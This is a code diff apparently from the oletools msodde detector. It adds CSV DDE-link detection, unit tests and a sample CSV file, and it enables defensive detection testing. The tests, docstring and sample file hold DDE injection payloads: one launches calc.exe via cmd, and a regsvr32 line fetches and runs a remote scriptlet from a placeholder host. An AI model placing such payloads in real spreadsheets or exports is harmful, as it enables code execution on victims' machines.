| 593 | 613 | if elem.attrib[ATTR_W_FLDCHARTYPE] == "begin": |
| 594 | - level += 1 | |
| 614 | + level += 1 | |
| 595 | 615 | if elem.attrib[ATTR_W_FLDCHARTYPE] == "end": |
| 596 | 616 | level -= 1 |
| 597 | - if level == 0 or level == -1 : # edge-case where level becomes -1 | |
| 617 | + if level == 0 or level == -1: # edge-case; level becomes -1 | |
| 598 | 618 | fields.append(ddetext) |
| 599 | 619 | ddetext = u'' |
| 600 | - level = 0 # reset edge-case | |
| 601 | - | |
| 620 | + level = 0 # reset edge-case | |
| 621 | + | |
| 602 | 622 | # concatenate the text of the field, if present: |
| 603 | 623 | if elem.tag == TAG_W_INSTRTEXT and elem.text is not None: |
| 604 | - #expand field code if QUOTED | |
| 624 | + # expand field code if QUOTED | |
| 605 | 625 | ddetext += unquote(elem.text) |
| 606 | 626 | |
| 607 | 627 | for elem in root.iter(TAG_W_FLDSIMPLE): |
| ... | ... | @@ -611,25 +631,28 @@ def process_xml(data): |
| 611 | 631 | |
| 612 | 632 | return fields |
| 613 | 633 | |
| 614 | -def unquote(field): | |
| 634 | + | |
| 635 | +def unquote(field): | |
| 615 | 636 | if "QUOTE" not in field or NO_QUOTES: |
| 616 | 637 | return field |
| 617 | - #split into components | |
| 638 | + # split into components | |
| 618 | 639 | parts = field.strip().split(" ") |
| 619 | 640 | ddestr = "" |
| 620 | - for p in parts[1:]: | |
| 621 | - try: | |
| 622 | - ch = chr(int(p)) | |
| 641 | + for part in parts[1:]: | |
| 642 | + try: | |
| 643 | + character = chr(int(part)) | |
| 623 | 644 | except ValueError: |
| 624 | - ch = p | |
| 625 | - ddestr += ch | |
| 645 | + character = part | |
| 646 | + ddestr += character | |
| 626 | 647 | return ddestr |
| 627 | 648 | |
| 649 | + | |
| 628 | 650 | # "static variables" for field_is_blacklisted: |
| 629 | 651 | FIELD_WORD_REGEX = re.compile(r'"[^"]*"|\S+') |
| 630 | 652 | FIELD_BLACKLIST_CMDS = tuple(field[0].lower() for field in FIELD_BLACKLIST) |
| 631 | 653 | FIELD_SWITCH_REGEX = re.compile(r'^\\[\w#*@]$') |
| 632 | 654 | |
| 655 | + | |
| 633 | 656 | def field_is_blacklisted(contents): |
| 634 | 657 | """ Check if given field contents matches any in FIELD_BLACKLIST |
| 635 | 658 | |
| ... | ... | @@ -651,7 +674,7 @@ def field_is_blacklisted(contents): |
| 651 | 674 | index = FIELD_BLACKLIST_CMDS.index(words[0].lower()) |
| 652 | 675 | except ValueError: # first word is no blacklisted command |
| 653 | 676 | return False |
| 654 | - log.debug('trying to match "{0}" to blacklist command {0}' | |
| 677 | + log.debug('trying to match "{0}" to blacklist command {1}' | |
| 655 | 678 | .format(contents, FIELD_BLACKLIST[index])) |
| 656 | 679 | _, nargs_required, nargs_optional, sw_with_arg, sw_solo, sw_format \ |
| 657 | 680 | = FIELD_BLACKLIST[index] |
| ... | ... | @@ -706,14 +729,15 @@ def field_is_blacklisted(contents): |
| 706 | 729 | if 'numeric' in sw_format: |
| 707 | 730 | arg_choices = [] # too many choices to list them here |
| 708 | 731 | else: |
| 709 | - log.debug('unexpected switch {0} in "{1}"'.format(switch, contents)) | |
| 732 | + log.debug('unexpected switch {0} in "{1}"' | |
| 733 | + .format(switch, contents)) | |
| 710 | 734 | return False |
| 711 | 735 | |
| 712 | 736 | # if nothing went wrong sofar, the contents seems to match the blacklist |
| 713 | 737 | return True |
| 714 | 738 | |
| 715 | 739 | |
| 716 | -def process_xlsx(filepath, filed_filter_mode=None): | |
| 740 | +def process_xlsx(filepath): | |
| 717 | 741 | """ process an OOXML excel file (e.g. .xlsx or .xlsb or .xlsm) """ |
| 718 | 742 | dde_links = [] |
| 719 | 743 | parser = ooxml.XmlParser(filepath) |
| ... | ... | @@ -733,7 +757,8 @@ def process_xlsx(filepath, filed_filter_mode=None): |
| 733 | 757 | try: |
| 734 | 758 | logging.info('Parsing non-xml subfile {0} with content type {1}' |
| 735 | 759 | .format(subfile, content_type)) |
| 736 | - for record in xls_parser.parse_xlsb_part(handle, content_type, subfile): | |
| 760 | + for record in xls_parser.parse_xlsb_part(handle, content_type, | |
| 761 | + subfile): | |
| 737 | 762 | logging.debug('{0}: {1}'.format(subfile, record)) |
| 738 | 763 | if isinstance(record, xls_parser.XlsbBeginSupBook) and \ |
| 739 | 764 | record.link_type == \ |
| ... | ... | @@ -791,8 +816,9 @@ class RtfFieldParser(rtfobj.RtfParser): |
| 791 | 816 | |
| 792 | 817 | RTF_START = b'\x7b\x5c\x72\x74' # == b'{\rt' but does not mess up auto-indent |
| 793 | 818 | |
| 819 | + | |
| 794 | 820 | def process_rtf(file_handle, field_filter_mode=None): |
| 795 | - log.debug('process_rtf') | |
| 821 | + """ find dde links or other fields in rtf file """ | |
| 796 | 822 | all_fields = [] |
| 797 | 823 | data = RTF_START + file_handle.read() # read complete file into memory! |
| 798 | 824 | file_handle.close() |
| ... | ... | @@ -818,35 +844,119 @@ def process_rtf(file_handle, field_filter_mode=None): |
| 818 | 844 | return u'\n'.join(clean_fields) |
| 819 | 845 | |
| 820 | 846 | |
| 847 | +# threshold when to consider a csv file "small"; also used as sniffing size | |
| 848 | +CSV_SMALL_THRESH = 1024 | |
| 849 | + | |
| 850 | +# format of dde link: program-name | arguments ! unimportant | |
| 851 | +CSV_DDE_FORMAT = re.compile(r'\s*=(.+)\|(.+)!(.*)\s*') | |
| 852 | + | |
| 853 | +# allowed delimiters (python sniffer would use nearly any char). Taken from | |
| 854 | +# https://data-gov.tw.rpi.edu/wiki/CSV_files_use_delimiters_other_than_commas | |
| 855 | +CSV_DELIMITERS = ',\t ;|^' | |
| 856 | + | |
| 857 | + | |
| 858 | +def process_csv(filepath): | |
| 859 | + """ find dde in csv text | |
| 860 | + | |
| 861 | + finds text parts like =cmd|'/k ..\\..\\..\\Windows\\System32\\calc.exe'! or | |
| 862 | + =MSEXCEL|'\\..\\..\\..\\Windows\\System32\\regsvr32 [...] | |
| 863 | + | |
| 864 | + Hoping here that the :py:class:`csv.Sniffer` determines quote and delimiter | |
| 865 | + chars the same way that excel does. Tested to some extend in unittests. | |
| 866 | + | |
| 867 | + This can only find DDE-links, no other "suspicious" constructs (yet). | |
| 868 | + """ | |
| 869 | + | |
| 870 | + results = [] | |
| 871 | + with open(filepath, 'r') as file_handle: | |
| 872 | + results, dialect = process_csv_dialect(file_handle, CSV_DELIMITERS) | |
| 873 | + is_small = file_handle.tell() < CSV_SMALL_THRESH | |
| 874 | + | |
| 875 | + if is_small and not results: | |
| 876 | + # easy to mis-sniff small files. Try different delimiters | |
| 877 | + log.debug('small file, no results; try all delimiters') | |
| 878 | + file_handle.seek(0) | |
| 879 | + other_delim = CSV_DELIMITERS.replace(dialect.delimiter, '') | |
| 880 | + for delim in other_delim: | |
| 881 | + try: | |
| 882 | + file_handle.seek(0) | |
| 883 | + results, _ = process_csv_dialect(file_handle, delim) | |
| 884 | + except csv.Error: # e.g. sniffing fails | |
| 885 | + log.debug('failed to csv-parse with delimiter {0!r}' | |
| 886 | + .format(delim)) | |
| 887 | + | |
| 888 | + if is_small and not results: | |
| 889 | + # try whole file as single cell, since sniffing fails in this case | |
| 890 | + log.debug('last attempt: take whole file as single unquoted cell') | |
| 891 | + file_handle.seek(0) | |
| 892 | + match = CSV_DDE_FORMAT.match(file_handle.read(CSV_SMALL_THRESH)) | |
| 893 | + if match: | |
| 894 | + results.append(u' '.join(match.groups()[:2])) | |
| 895 | + | |
| 896 | + return u'\n'.join(results) | |
| 897 | + | |
| 898 | + | |
| 899 | +def process_csv_dialect(file_handle, delimiters): | |
| 900 | + """ helper for process_csv: process with a specific csv dialect """ | |
| 901 | + | |
| 902 | + # determine dialect = delimiter chars, quote chars, ... | |
| 903 | + dialect = csv.Sniffer().sniff(file_handle.read(CSV_SMALL_THRESH), | |
| 904 | + delimiters=delimiters) | |
| 905 | + dialect.strict = False # microsoft is never strict | |
| 906 | + log.debug('sniffed csv dialect with delimiter {0!r} ' | |
| 907 | + 'and quote char {1!r}' | |
| 908 | + .format(dialect.delimiter, dialect.quotechar)) | |
| 909 | + | |
| 910 | + # rewind file handle to start | |
| 911 | + file_handle.seek(0) | |
| 912 | + | |
| 913 | + # loop over all csv rows and columns | |
| 914 | + results = [] | |
| 915 | + reader = csv.reader(file_handle, dialect) | |
| 916 | + for row in reader: | |
| 917 | + for cell in row: | |
| 918 | + # check if cell matches | |
| 919 | + match = CSV_DDE_FORMAT.match(cell) | |
| 920 | + if match: | |
| 921 | + results.append(u' '.join(match.groups()[:2])) | |
| 922 | + return results, dialect | |
| 923 | + | |
| 924 | + | |
| 821 | 925 | def process_file(filepath, field_filter_mode=None): |
| 822 | - """ decides which of process_doc/x or process_xls/x to call """ | |
| 926 | + """ decides which of the process_* functions to call """ | |
| 823 | 927 | if olefile.isOleFile(filepath): |
| 824 | - log.debug('checking streams to see whether this is xls') | |
| 928 | + log.debug('Is OLE. Checking streams to see whether this is xls') | |
| 825 | 929 | if xls_parser.is_xls(filepath): |
| 930 | + log.debug('Process file as excel 2003 (xls)') | |
| 826 | 931 | return process_xls(filepath) |
| 827 | 932 | else: |
| 933 | + log.debug('Process file as word 2003 (doc)') | |
| 828 | 934 | return process_doc(filepath) |
| 829 | 935 | |
| 830 | 936 | with open(filepath, 'rb') as file_handle: |
| 831 | - if file_handle.read(4) == RTF_START: | |
| 832 | - # This is a RTF file | |
| 937 | + if file_handle.read(4) == RTF_START: | |
| 938 | + log.debug('Process file as rtf') | |
| 833 | 939 | return process_rtf(file_handle, field_filter_mode) |
| 834 | 940 | |
| 835 | 941 | try: |
| 836 | 942 | doctype = ooxml.get_type(filepath) |
| 837 | - except Exception: | |
| 838 | - log.debug('Exception trying to xml-parse file', exc_info=True) | |
| 943 | + log.debug('Detected file type: {0}'.format(doctype)) | |
| 944 | + except Exception as exc: | |
| 945 | + log.debug('Exception trying to xml-parse file: {0}'.format(exc)) | |
| 839 | 946 | doctype = None |
| 840 | 947 | |
| 841 | - if doctype: | |
| 842 | - log.debug('Detected file type: {0}'.format(doctype)) | |
| 843 | 948 | if doctype == ooxml.DOCTYPE_EXCEL: |
| 844 | - return process_xlsx(filepath, field_filter_mode) | |
| 845 | - else: | |
| 949 | + log.debug('Process file as excel 2007+ (xlsx)') | |
| 950 | + return process_xlsx(filepath) | |
| 951 | + elif doctype is None: | |
| 952 | + log.debug('Process file as csv') | |
| 953 | + return process_csv(filepath) | |
| 954 | + else: # could be docx; if not: this is the old default code path | |
| 955 | + log.debug('Process file as word 2007+ (docx)') | |
| 846 | 956 | return process_docx(filepath, field_filter_mode) |
| 847 | 957 | |
| 848 | 958 | |
| 849 | -#=== MAIN ================================================================= | |
| 959 | +# === MAIN ================================================================= | |
| 850 | 960 | |
| 851 | 961 | def main(cmd_line_args=None): |
| 852 | 962 | """ Main function, called if this file is called as a script |
| ... | ... | @@ -868,10 +978,10 @@ def main(cmd_line_args=None): |
| 868 | 978 | if args.json and args.loglevel.lower() == 'debug': |
| 869 | 979 | log.warning('Debug log output will not be json-compatible!') |
| 870 | 980 | |
| 871 | - if args.nounquote : | |
| 981 | + if args.nounquote: | |
| 872 | 982 | global NO_QUOTES |
| 873 | 983 | NO_QUOTES = True |
| 874 | - | |
| 984 | + | |
| 875 | 985 | if args.json: |
| 876 | 986 | jout = [] |
| 877 | 987 | jout.append(BANNER_JSON) |
| ... | ... | @@ -890,7 +1000,7 @@ def main(cmd_line_args=None): |
| 890 | 1000 | except Exception as exc: |
| 891 | 1001 | if args.json: |
| 892 | 1002 | jout.append(dict(type='error', error=type(exc).__name__, |
| 893 | - message=str(exc))) # strange: str(exc) is enclosed in "" | |
| 1003 | + message=str(exc))) | |
| 894 | 1004 | else: |
| 895 | 1005 | raise # re-raise last known exception, keeping trace intact |
| 896 | 1006 | ... | ... |
tests/msodde/test_basic.py
| ... | ... | @@ -17,11 +17,13 @@ from traceback import print_exc |
| 17 | 17 | |
| 18 | 18 | |
| 19 | 19 | class TestReturnCode(unittest.TestCase): |
| 20 | + """ check return codes and exception behaviour (not text output) """ | |
| 20 | 21 | |
| 21 | 22 | def test_valid_doc(self): |
| 22 | 23 | """ check that a valid doc file leads to 0 exit status """ |
| 23 | - for filename in ('dde-test-from-office2003', 'dde-test-from-office2016', | |
| 24 | - 'harmless-clean', 'dde-test-from-office2013-utf_16le-korean'): | |
| 24 | + for filename in ( | |
| 25 | + 'dde-test-from-office2003', 'dde-test-from-office2016', | |
| 26 | + 'harmless-clean', 'dde-test-from-office2013-utf_16le-korean'): | |
| 25 | 27 | self.do_test_validity(join(BASE_DIR, 'msodde', |
| 26 | 28 | filename + '.doc')) |
| 27 | 29 | |
| ... | ... | @@ -65,9 +67,9 @@ class TestReturnCode(unittest.TestCase): |
| 65 | 67 | except Exception: |
| 66 | 68 | have_exception = True |
| 67 | 69 | print_exc() |
| 68 | - except SystemExit as se: # sys.exit() was called | |
| 69 | - return_code = se.code | |
| 70 | - if se.code is None: | |
| 70 | + except SystemExit as exc: # sys.exit() was called | |
| 71 | + return_code = exc.code | |
| 72 | + if exc.code is None: | |
| 71 | 73 | return_code = 0 |
| 72 | 74 | |
| 73 | 75 | self.assertEqual(expect_error, have_exception or (return_code != 0), |
| ... | ... | @@ -77,9 +79,13 @@ class TestReturnCode(unittest.TestCase): |
| 77 | 79 | |
| 78 | 80 | |
| 79 | 81 | class TestDdeLinks(unittest.TestCase): |
| 82 | + """ capture output of msodde and check dde-links are found correctly """ | |
| 80 | 83 | |
| 81 | 84 | def get_dde_from_output(self, capturer): |
| 82 | - """ helper to read dde links from captured output """ | |
| 85 | + """ helper to read dde links from captured output | |
| 86 | + | |
| 87 | + duplicate in tests/msodde/test_csv | |
| 88 | + """ | |
| 83 | 89 | have_start_line = False |
| 84 | 90 | result = [] |
| 85 | 91 | for line in capturer: |
| ... | ... | @@ -90,7 +96,7 @@ class TestDdeLinks(unittest.TestCase): |
| 90 | 96 | elif line == 'DDE Links:': |
| 91 | 97 | have_start_line = True |
| 92 | 98 | |
| 93 | - self.assertTrue(have_start_line) # ensure output was complete | |
| 99 | + self.assertTrue(have_start_line) # ensure output was complete | |
| 94 | 100 | return result |
| 95 | 101 | |
| 96 | 102 | def test_with_dde(self): | ... | ... |
tests/msodde/test_blacklist.py
| ... | ... | @@ -39,8 +39,8 @@ EXAMPLES_MATCH = ( |
| 39 | 39 | r'ADVANCE \x 150', |
| 40 | 40 | r'AUTHOR', |
| 41 | 41 | r'AUTHOR "Tony Caruso"', |
| 42 | - r'BIBLIOGRAPHY \l 1033', # note: the original example has "/l 1033" | |
| 43 | - r'CITATION Ecma01 \l 1033', # note: this also. Hope this is just a typo | |
| 42 | + r'BIBLIOGRAPHY \l 1033', # note: the original example has "/l 1033" | |
| 43 | + r'CITATION Ecma01 \l 1033', # note: this also. Hope this is just a typo | |
| 44 | 44 | r'COMMENTS', |
| 45 | 45 | r'COMMENTS "I came, I saw, I was not impressed."', |
| 46 | 46 | r'CREATEDATE', |
| ... | ... | @@ -228,6 +228,7 @@ EXAMPLES_NOMATCH = ( |
| 228 | 228 | r'SKIPIF MERGEFIELD Order < 100', |
| 229 | 229 | ) |
| 230 | 230 | |
| 231 | + | |
| 231 | 232 | class TestBlacklist(unittest.TestCase): |
| 232 | 233 | """ Tests msodde blacklist feature """ |
| 233 | 234 | ... | ... |
tests/msodde/test_csv.py
0 → 100644
| 1 | +#!/usr/bin/env python3 | |
| 2 | + | |
| 3 | + | |
| 4 | +""" Check various csv examples """ | |
| 5 | + | |
| 6 | +import unittest | |
| 7 | +from tempfile import mkstemp | |
| 8 | +import os | |
| 9 | +from os.path import join | |
| 10 | + | |
| 11 | +from oletools import msodde | |
| 12 | +from tests.test_utils import OutputCapture, DATA_BASE_DIR | |
| 13 | + | |
| 14 | + | |
| 15 | +class TestCSV(unittest.TestCase): | |
| 16 | + """ Check various csv examples """ | |
| 17 | + | |
| 18 | + DO_DEBUG = False | |
| 19 | + | |
| 20 | + def test_texts(self): | |
| 21 | + """ write some sample texts to file, run those """ | |
| 22 | + SAMPLES = ( | |
| 23 | + "=cmd|'/k ..\\..\\..\\Windows\\System32\\calc.exe'!''", | |
| 24 | + "=MSEXCEL|'\\..\\..\\..\\Windows\\System32\\regsvr32 /s /n /u " + | |
| 25 | + "/i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll'!''", | |
| 26 | + "completely innocent text" | |
| 27 | + ) | |
| 28 | + | |
| 29 | + LONG_SAMPLE_FACTOR = 100 # make len(sample) > CSV_SMALL_THRESH | |
| 30 | + DELIMITERS = ',\t ;|^' | |
| 31 | + QUOTES = '', '"' # no ' since samples use those "internally" | |
| 32 | + PREFIXES = ('', '{quote}item-before{quote}{delim}', | |
| 33 | + '{quote}line{delim}before{quote}\n'*LONG_SAMPLE_FACTOR, | |
| 34 | + '{quote}line{delim}before{quote}\n'*LONG_SAMPLE_FACTOR + | |
| 35 | + '{quote}item-before{quote}{delim}') | |
| 36 | + SUFFIXES = ('', '{delim}{quote}item-after{quote}', | |
| 37 | + '\n{quote}line{delim}after{quote}'*LONG_SAMPLE_FACTOR, | |
| 38 | + '{delim}{quote}item-after{quote}' + | |
| 39 | + '\n{quote}line{delim}after{quote}'*LONG_SAMPLE_FACTOR) | |
| 40 | + | |
| 41 | + for sample_core in SAMPLES: | |
| 42 | + for prefix in PREFIXES: | |
| 43 | + for suffix in SUFFIXES: | |
| 44 | + for delim in DELIMITERS: | |
| 45 | + for quote in QUOTES: | |
| 46 | + # without quoting command is split at space or | | |
| 47 | + if quote == '' and delim in sample_core: | |
| 48 | + continue | |
| 49 | + | |
| 50 | + sample = \ | |
| 51 | + prefix.format(quote=quote, delim=delim) + \ | |
| 52 | + quote + sample_core + quote + \ | |
| 53 | + suffix.format(quote=quote, delim=delim) | |
| 54 | + output = self.write_and_run(sample) | |
| 55 | + n_links = len(self.get_dde_from_output(output)) | |
| 56 | + desc = 'sample with core={0!r}, prefix-len {1}, ' \ | |
| 57 | + 'suffix-len {2}, delim {3!r} and quote ' \ | |
| 58 | + '{4!r}'.format(sample_core, len(prefix), | |
| 59 | + len(suffix), delim, quote) | |
| 60 | + if 'innocent' in sample: | |
| 61 | + self.assertEqual(n_links, 0, 'found dde-link ' | |
| 62 | + 'in clean sample') | |
| 63 | + else: | |
| 64 | + msg = 'Failed to find dde-link in ' + desc | |
| 65 | + self.assertEqual(n_links, 1, msg) | |
| 66 | + if self.DO_DEBUG: | |
| 67 | + print('Worked: ' + desc) | |
| 68 | + | |
| 69 | + def test_file(self): | |
| 70 | + """ test simple small example file """ | |
| 71 | + filename = join(DATA_BASE_DIR, 'msodde', 'dde-in-csv.csv') | |
| 72 | + with OutputCapture() as capturer: | |
| 73 | + capturer.reload_module(msodde) # re-create logger | |
| 74 | + ret_code = msodde.main([filename, ]) | |
| 75 | + self.assertEqual(ret_code, 0) | |
| 76 | + links = self.get_dde_from_output(capturer) | |
| 77 | + self.assertEqual(len(links), 1) | |
| 78 | + self.assertEqual(links[0], | |
| 79 | + r"cmd '/k \..\..\..\Windows\System32\calc.exe'") | |
| 80 | + | |
| 81 | + def write_and_run(self, sample_text): | |
| 82 | + """ helper for test_texts: save text to file, run through msodde """ | |
| 83 | + filename = None | |
| 84 | + handle = 0 | |
| 85 | + try: | |
| 86 | + handle, filename = mkstemp(prefix='oletools-test-csv-', text=True) | |
| 87 | + os.write(handle, sample_text.encode('ascii')) | |
| 88 | + os.close(handle) | |
| 89 | + handle = 0 | |
| 90 | + args = [filename, ] | |
| 91 | + if self.DO_DEBUG: | |
| 92 | + args += ['-l', 'debug'] | |
| 93 | + | |
| 94 | + with OutputCapture() as capturer: | |
| 95 | + capturer.reload_module(msodde) # re-create logger | |
| 96 | + ret_code = msodde.main(args) | |
| 97 | + self.assertEqual(ret_code, 0, 'checking sample resulted in ' | |
| 98 | + 'error:\n' + sample_text) | |
| 99 | + return capturer | |
| 100 | + | |
| 101 | + except Exception: | |
| 102 | + raise | |
| 103 | + finally: | |
| 104 | + if handle: | |
| 105 | + os.close(handle) | |
| 106 | + handle = 0 # just in case | |
| 107 | + if filename: | |
| 108 | + if self.DO_DEBUG: | |
| 109 | + print('keeping for debug purposes: {0}'.format(filename)) | |
| 110 | + else: | |
| 111 | + os.remove(filename) | |
| 112 | + filename = None # just in case | |
| 113 | + | |
| 114 | + def get_dde_from_output(self, capturer): | |
| 115 | + """ helper to read dde links from captured output | |
| 116 | + | |
| 117 | + duplicate in tests/msodde/test_basic | |
| 118 | + """ | |
| 119 | + have_start_line = False | |
| 120 | + result = [] | |
| 121 | + for line in capturer: | |
| 122 | + if self.DO_DEBUG: | |
| 123 | + print('captured: ' + line) | |
| 124 | + if not line.strip(): | |
| 125 | + continue # skip empty lines | |
| 126 | + if have_start_line: | |
| 127 | + result.append(line) | |
| 128 | + elif line == 'DDE Links:': | |
| 129 | + have_start_line = True | |
| 130 | + | |
| 131 | + self.assertTrue(have_start_line) # ensure output was complete | |
| 132 | + return result | |
| 133 | + | |
| 134 | + | |
| 135 | +# just in case somebody calls this file as a script | |
| 136 | +if __name__ == '__main__': | |
| 137 | + unittest.main() | ... | ... |
tests/ooxml/test_basic.py
| ... | ... | @@ -12,24 +12,33 @@ from oletools import ooxml |
| 12 | 12 | class TestOOXML(unittest.TestCase): |
| 13 | 13 | """ Tests my cool new feature """ |
| 14 | 14 | |
| 15 | + DO_DEBUG = False | |
| 16 | + | |
| 15 | 17 | def test_all_rough(self): |
| 16 | 18 | """Checks all samples, expect either ole files or good ooxml output""" |
| 17 | 19 | acceptable = ooxml.DOCTYPE_EXCEL, ooxml.DOCTYPE_WORD, \ |
| 18 | 20 | ooxml.DOCTYPE_POWERPOINT |
| 21 | + | |
| 22 | + # files that are neither OLE nor xml: | |
| 19 | 23 | except_files = 'empty', 'text' |
| 20 | - except_extns = '.xml', '.rtf' | |
| 24 | + except_extns = '.xml', '.rtf', '.csv' | |
| 25 | + | |
| 26 | + # analyse all files in data dir | |
| 21 | 27 | for base_dir, _, files in os.walk(DATA_BASE_DIR): |
| 22 | 28 | for filename in files: |
| 23 | 29 | if filename in except_files: |
| 24 | - #print('skip file: ' + filename) | |
| 30 | + if self.DO_DEBUG: | |
| 31 | + print('skip file: ' + filename) | |
| 25 | 32 | continue |
| 26 | 33 | if splitext(filename)[1] in except_extns: |
| 27 | - #print('skip extn: ' + filename) | |
| 34 | + if self.DO_DEBUG: | |
| 35 | + print('skip extn: ' + filename) | |
| 28 | 36 | continue |
| 29 | 37 | |
| 30 | 38 | full_name = join(base_dir, filename) |
| 31 | 39 | if isOleFile(full_name): |
| 32 | - #print('skip ole: ' + filename) | |
| 40 | + if self.DO_DEBUG: | |
| 41 | + print('skip ole: ' + filename) | |
| 33 | 42 | continue |
| 34 | 43 | try: |
| 35 | 44 | doctype = ooxml.get_type(full_name) |
| ... | ... | @@ -38,7 +47,8 @@ class TestOOXML(unittest.TestCase): |
| 38 | 47 | self.assertTrue(doctype in acceptable, |
| 39 | 48 | msg='Doctype "{0}" for {1} not acceptable' |
| 40 | 49 | .format(doctype, full_name)) |
| 41 | - #print('ok: ' + filename + doctype) | |
| 50 | + if self.DO_DEBUG: | |
| 51 | + print('ok: {0} --> {1}'.format(filename, doctype)) | |
| 42 | 52 | |
| 43 | 53 | |
| 44 | 54 | # just in case somebody calls this file as a script | ... | ... |
tests/test-data/msodde/dde-in-csv.csv
0 → 100644
| 1 | +=cmd|'/k \..\..\..\Windows\System32\calc.exe'!A0 | ... | ... |
tests/test_utils/output_capture.py
| ... | ... | @@ -2,13 +2,20 @@ |
| 2 | 2 | |
| 3 | 3 | from __future__ import print_function |
| 4 | 4 | import sys |
| 5 | +import logging | |
| 5 | 6 | |
| 6 | 7 | |
| 7 | 8 | # python 2/3 version conflict: |
| 8 | 9 | if sys.version_info.major <= 2: |
| 9 | 10 | from StringIO import StringIO |
| 11 | + # reload is a builtin | |
| 10 | 12 | else: |
| 11 | 13 | from io import StringIO |
| 14 | + if sys.version_info.minor < 4: | |
| 15 | + from imp import reload | |
| 16 | + else: | |
| 17 | + from importlib import reload | |
| 18 | + | |
| 12 | 19 | |
| 13 | 20 | class OutputCapture: |
| 14 | 21 | """ context manager that captures stdout |
| ... | ... | @@ -24,6 +31,10 @@ class OutputCapture: |
| 24 | 31 | # ...or test all output in one go |
| 25 | 32 | some_test(capturer.get_data()) |
| 26 | 33 | |
| 34 | + In order to solve issues with old logger instances still remembering closed | |
| 35 | + StringIO instances as "their" stdout, logging is shutdown and restarted | |
| 36 | + upon entering this Context Manager. This means that you may have to reload | |
| 37 | + your module, as well. | |
| 27 | 38 | """ |
| 28 | 39 | |
| 29 | 40 | def __init__(self): |
| ... | ... | @@ -32,6 +43,11 @@ class OutputCapture: |
| 32 | 43 | self.data = None |
| 33 | 44 | |
| 34 | 45 | def __enter__(self): |
| 46 | + # Avoid problems with old logger instances that still remember an old | |
| 47 | + # closed StringIO as their sys.stdout | |
| 48 | + logging.shutdown() | |
| 49 | + reload(logging) | |
| 50 | + | |
| 35 | 51 | # replace sys.stdout with own buffer. |
| 36 | 52 | self.orig_stdout = sys.stdout |
| 37 | 53 | sys.stdout = self.buffer |
| ... | ... | @@ -61,3 +77,7 @@ class OutputCapture: |
| 61 | 77 | def __iter__(self): |
| 62 | 78 | for line in self.get_data().splitlines(): |
| 63 | 79 | yield line |
| 80 | + | |
| 81 | + def reload_module(self, mod): | |
| 82 | + """ Wrapper around reload function for different python versions """ | |
| 83 | + return reload(mod) | ... | ... |